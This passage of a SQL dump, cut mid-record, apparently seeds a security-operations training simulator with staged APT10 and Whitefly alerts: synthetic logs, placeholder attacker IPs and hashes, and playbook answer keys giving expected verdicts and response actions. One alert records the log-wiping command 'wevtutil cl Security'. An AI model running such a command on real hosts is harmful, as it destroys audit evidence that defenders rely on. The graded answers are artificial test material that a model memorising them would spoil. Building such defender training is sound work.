3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"application\\\":\\\"legitapp.exe\\\",\\\"loaded_dll\\\":\\\"msvcr110.dll\\\",\\\"original_dll_path\\\":\\\"C:\\\\\\\\Program 
Files\\\\\\\\LegitApp\\\\\\\\msvcr110.dll\\\",\\\"malicious_dll_path\\\":\\\"C:\\\\\\\\Temp\\\\\\\\msvcr110.dll\\\",\\\"executing_user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"hash_malicious_dll\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"malware_name\\\":\\\"APT10_SideLoad\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.990Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"application\\\":\\\"legitapp.exe\\\",\\\"loaded_dll\\\":\\\"msvcr110.dll\\\",\\\"original_dll_path\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\LegitApp\\\\\\\\msvcr110.dll\\\",\\\"malicious_dll_path\\\":\\\"C:\\\\\\\\Temp\\\\\\\\msvcr110.dll\\\",\\\"executing_user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"hash_malicious_dll\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"malware_name\\\":\\\"APT10_SideLoad\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(391, 'Establishing Persistence with Backdoor Implant', 'high', 'System Registry Changes', 'APT10 has been detected establishing long-term persistence by deploying a backdoor implant within the aerospace company\'s network. The attack involved registry modifications pointing to a malicious service executable.', 'Persistence', 'T1050: New Service', 1, 'new', NULL, '{\"time\":\"2023-09-15T14:23:45Z\",\"event_id\":7045,\"source_ip\":\"203.0.113.5\",\"internal_ip\":\"192.168.1.20\",\"user\":\"jdoe\",\"registry_key\":\"HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\MaliciousService\",\"service_name\":\"MaliciousService\",\"image_path\":\"C:\\\\Windows\\\\System32\\\\malicious.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"Service Installed\",\"description\":\"A new service was installed on the machine to maintain persistence.\"}', '2026-01-04 02:14:19', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known APT10 command and control server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Sandbox\",\"verdict\":\"malicious\",\"details\":\"Executable file used by APT10 for persistence.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known APT10 
malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account used during the attack.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.992Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"time\\\":\\\"2023-09-15T14:23:45Z\\\",\\\"event_id\\\":7045,\\\"source_ip\\\":\\\"203.0.113.5\\\",\\\"internal_ip\\\":\\\"192.168.1.20\\\",\\\"user\\\":\\\"jdoe\\\",\\\"registry_key\\\":\\\"HKLM\\\\\\\\SYSTEM\\\\\\\\CurrentControlSet\\\\\\\\Services\\\\\\\\MaliciousService\\\",\\\"service_name\\\":\\\"MaliciousService\\\",\\\"image_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Service Installed\\\",\\\"description\\\":\\\"A new service was installed on the machine to maintain persistence.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.992Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"time\\\":\\\"2023-09-15T14:23:45Z\\\",\\\"event_id\\\":7045,\\\"source_ip\\\":\\\"203.0.113.5\\\",\\\"internal_ip\\\":\\\"192.168.1.20\\\",\\\"user\\\":\\\"jdoe\\\",\\\"registry_key\\\":\\\"HKLM\\\\\\\\SYSTEM\\\\\\\\CurrentControlSet\\\\\\\\Services\\\\\\\\MaliciousService\\\",\\\"service_name\\\":\\\"MaliciousService\\\",\\\"image_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Service Installed\\\",\\\"description\\\":\\\"A new service was installed on the machine to maintain persistence.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.992Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"time\\\":\\\"2023-09-15T14:23:45Z\\\",\\\"event_id\\\":7045,\\\"source_ip\\\":\\\"203.0.113.5\\\",\\\"internal_ip\\\":\\\"192.168.1.20\\\",\\\"user\\\":\\\"jdoe\\\",\\\"registry_key\\\":\\\"HKLM\\\\\\\\SYSTEM\\\\\\\\CurrentControlSet\\\\\\\\Services\\\\\\\\MaliciousService\\\",\\\"service_name\\\":\\\"MaliciousService\\\",\\\"image_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Service Installed\\\",\\\"description\\\":\\\"A new service was installed on the machine to maintain persistence.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.992Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"time\\\":\\\"2023-09-15T14:23:45Z\\\",\\\"event_id\\\":7045,\\\"source_ip\\\":\\\"203.0.113.5\\\",\\\"internal_ip\\\":\\\"192.168.1.20\\\",\\\"user\\\":\\\"jdoe\\\",\\\"registry_key\\\":\\\"HKLM\\\\\\\\SYSTEM\\\\\\\\CurrentControlSet\\\\\\\\Services\\\\\\\\MaliciousService\\\",\\\"service_name\\\":\\\"MaliciousService\\\",\\\"image_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Service Installed\\\",\\\"description\\\":\\\"A new service was installed on the machine to maintain persistence.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.992Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"time\\\":\\\"2023-09-15T14:23:45Z\\\",\\\"event_id\\\":7045,\\\"source_ip\\\":\\\"203.0.113.5\\\",\\\"internal_ip\\\":\\\"192.168.1.20\\\",\\\"user\\\":\\\"jdoe\\\",\\\"registry_key\\\":\\\"HKLM\\\\\\\\SYSTEM\\\\\\\\CurrentControlSet\\\\\\\\Services\\\\\\\\MaliciousService\\\",\\\"service_name\\\":\\\"MaliciousService\\\",\\\"image_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Service Installed\\\",\\\"description\\\":\\\"A new service was installed on the machine to maintain persistence.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(392, 'Lateral Movement to Access Design Servers', 'high', 'Network Traffic Analysis', 'During the investigation of unusual network patterns, it was identified that a malicious entity performed lateral movement within the corporate network to access critical design servers. The attackers employed techniques consistent with the APT10 group\'s TTPs, leveraging compromised credentials to gain unauthorized access to servers containing sensitive CAD files. This alert represents step 4 of the operation where the attackers successfully reached the target servers.', 'Lateral Movement', 'T1080: Taint Shared Content', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:22:18Z\",\"src_ip\":\"192.168.1.105\",\"dst_ip\":\"10.0.0.45\",\"attacker_ip\":\"203.0.113.45\",\"user\":\"j.doe@company.com\",\"accessed_file\":\"designServerAccess.log\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"lateral_move\",\"result\":\"success\",\"protocol\":\"SMB\",\"malware\":\"CloudHopper\",\"description\":\"Lateral movement detected towards design server using stolen credentials.\",\"os\":\"Windows Server 2019\"}', '2026-01-04 02:14:19', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP involved in lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Target design server IP.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known attacker IP associated with 
APT10.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with CloudHopper malware.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"designServerAccess.log\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"clean\",\"details\":\"Log file accessed during lateral movement.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"j.doe@company.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Compromised user account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(393, 'Data Collection from CAD Repositories', 'high', 'File Access Logs', 'APT10 is actively collecting large CAD files from compromised servers within the aerospace sector. This operation stage focuses on aggregating these files for planned exfiltration.', 'Collection', 'T1119 - Automated Collection', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:47Z\",\"event_id\":\"file_access_8765\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.25\",\"user\":\"j.doe\",\"access_type\":\"read\",\"file_name\":\"aerospace_project_design.cad\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"file_size\":\"15MB\",\"protocol\":\"SMB\",\"action\":\"access_granted\"}', '2026-01-04 02:14:19', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known APT10 IP involved in previous aerospace sector attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised server.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"aerospace_project_design.cad\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Integrity Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Sensitive CAD file targeted by APT10.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Hash Database\",\"verdict\":\"clean\",\"details\":\"Common placeholder hash, needs further investigation for exact matches.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 
'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.995Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:47Z\\\",\\\"event_id\\\":\\\"file_access_8765\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.25\\\",\\\"user\\\":\\\"j.doe\\\",\\\"access_type\\\":\\\"read\\\",\\\"file_name\\\":\\\"aerospace_project_design.cad\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_size\\\":\\\"15MB\\\",\\\"protocol\\\":\\\"SMB\\\",\\\"action\\\":\\\"access_granted\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.995Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:47Z\\\",\\\"event_id\\\":\\\"file_access_8765\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.25\\\",\\\"user\\\":\\\"j.doe\\\",\\\"access_type\\\":\\\"read\\\",\\\"file_name\\\":\\\"aerospace_project_design.cad\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_size\\\":\\\"15MB\\\",\\\"protocol\\\":\\\"SMB\\\",\\\"action\\\":\\\"access_granted\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.995Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:47Z\\\",\\\"event_id\\\":\\\"file_access_8765\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.25\\\",\\\"user\\\":\\\"j.doe\\\",\\\"access_type\\\":\\\"read\\\",\\\"file_name\\\":\\\"aerospace_project_design.cad\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_size\\\":\\\"15MB\\\",\\\"protocol\\\":\\\"SMB\\\",\\\"action\\\":\\\"access_granted\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.995Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:47Z\\\",\\\"event_id\\\":\\\"file_access_8765\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.25\\\",\\\"user\\\":\\\"j.doe\\\",\\\"access_type\\\":\\\"read\\\",\\\"file_name\\\":\\\"aerospace_project_design.cad\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_size\\\":\\\"15MB\\\",\\\"protocol\\\":\\\"SMB\\\",\\\"action\\\":\\\"access_granted\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.995Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:47Z\\\",\\\"event_id\\\":\\\"file_access_8765\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.25\\\",\\\"user\\\":\\\"j.doe\\\",\\\"access_type\\\":\\\"read\\\",\\\"file_name\\\":\\\"aerospace_project_design.cad\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_size\\\":\\\"15MB\\\",\\\"protocol\\\":\\\"SMB\\\",\\\"action\\\":\\\"access_granted\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(394, 'Exfiltration of CAD Files via Encrypted Channels', 'high', 'Outbound Network Traffic', 'APT10 is utilizing encrypted channels to exfiltrate CAD files from the network. The operation involves transferring data to a known malicious external IP using SSL/TLS encryption, making detection challenging.', 'Exfiltration', 'T1048.002 - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":\"exfil-20231012-001\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":443,\"protocol\":\"TLS\",\"encrypted_data_size\":\"15MB\",\"file_hash\":\"9e107d9d372bb6826bd81d3542a419d6\",\"filename\":\"designs_v3_aggregated.zip\",\"user\":\"jdoe\",\"process_name\":\"explorer.exe\",\"indicator_of_compromise\":[{\"type\":\"ip\",\"value\":\"203.0.113.45\"},{\"type\":\"hash\",\"value\":\"9e107d9d372bb6826bd81d3542a419d6\"},{\"type\":\"filename\",\"value\":\"designs_v3_aggregated.zip\"}],\"alert_description\":\"Observed encrypted data transfer to a known malicious IP associated with APT10.\"}', '2026-01-04 02:14:19', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known APT10 infrastructure component.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"9e107d9d372bb6826bd81d3542a419d6\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with data exfiltration activities.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"designs_v3_aggregated.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"suspicious\",\"details\":\"File name pattern matches previous exfiltration 
attempts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(395, 'Clean-up and Cover Tracks', 'high', 'System Event Logs', 'The attackers attempted to erase logs and artifacts to obscure their presence and activities within the network. This is a typical step in their operation to remove traces of intrusion.', 'Defense Evasion', 'T1070.001 - Indicator Removal: Clear Windows Event Logs', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:22:35Z\",\"event_id\":4625,\"event_type\":\"Security\",\"action\":\"Log Deletion\",\"username\":\"admin_user\",\"host_ip\":\"10.0.0.15\",\"source_ip\":\"203.0.113.45\",\"log_file\":\"C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\Security.evtx\",\"hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"process\":\"wevtutil.exe\",\"command_line\":\"wevtutil cl Security\"}', '2026-01-04 02:14:19', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with APT10 activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with potential malicious activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.998Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:35Z\\\",\\\"event_id\\\":4625,\\\"event_type\\\":\\\"Security\\\",\\\"action\\\":\\\"Log Deletion\\\",\\\"username\\\":\\\"admin_user\\\",\\\"host_ip\\\":\\\"10.0.0.15\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"log_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"process\\\":\\\"wevtutil.exe\\\",\\\"command_line\\\":\\\"wevtutil cl Security\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.998Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:35Z\\\",\\\"event_id\\\":4625,\\\"event_type\\\":\\\"Security\\\",\\\"action\\\":\\\"Log Deletion\\\",\\\"username\\\":\\\"admin_user\\\",\\\"host_ip\\\":\\\"10.0.0.15\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"log_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"process\\\":\\\"wevtutil.exe\\\",\\\"command_line\\\":\\\"wevtutil cl Security\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.998Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:35Z\\\",\\\"event_id\\\":4625,\\\"event_type\\\":\\\"Security\\\",\\\"action\\\":\\\"Log Deletion\\\",\\\"username\\\":\\\"admin_user\\\",\\\"host_ip\\\":\\\"10.0.0.15\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"log_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"process\\\":\\\"wevtutil.exe\\\",\\\"command_line\\\":\\\"wevtutil cl 
Security\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.998Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:35Z\\\",\\\"event_id\\\":4625,\\\"event_type\\\":\\\"Security\\\",\\\"action\\\":\\\"Log Deletion\\\",\\\"username\\\":\\\"admin_user\\\",\\\"host_ip\\\":\\\"10.0.0.15\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"log_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"process\\\":\\\"wevtutil.exe\\\",\\\"command_line\\\":\\\"wevtutil cl Security\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.998Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:35Z\\\",\\\"event_id\\\":4625,\\\"event_type\\\":\\\"Security\\\",\\\"action\\\":\\\"Log Deletion\\\",\\\"username\\\":\\\"admin_user\\\",\\\"host_ip\\\":\\\"10.0.0.15\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"log_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"process\\\":\\\"wevtutil.exe\\\",\\\"command_line\\\":\\\"wevtutil cl Security\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(396, 'Suspicious Network Activity Detected', 'high', 'Network Intrusion Detection System (NIDS)', 'Initial access attempt identified through a phishing email containing a malicious link, typically used by the Whitefly group. The email was sent to an internal user and contained a link leading to the download of a malicious payload.', 'Initial Access', 'T1566.002 - Phishing: Spearphishing Link', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:23:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"protocol\":\"HTTP\",\"url\":\"http://malicious-example.com/download\",\"email_sender\":\"hacker@example.com\",\"email_recipient\":\"user@internal.com\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"file_hash\":\"2b8e5d8f7e9c4f8a9b6e5d9f7c6b8e5d\",\"filename\":\"invoice.pdf\",\"alert\":\"Phishing Link Detected\",\"ids_reference\":\"NIDS-2345\"}', '2026-01-04 02:15:53', '2026-02-14 16:52:12', 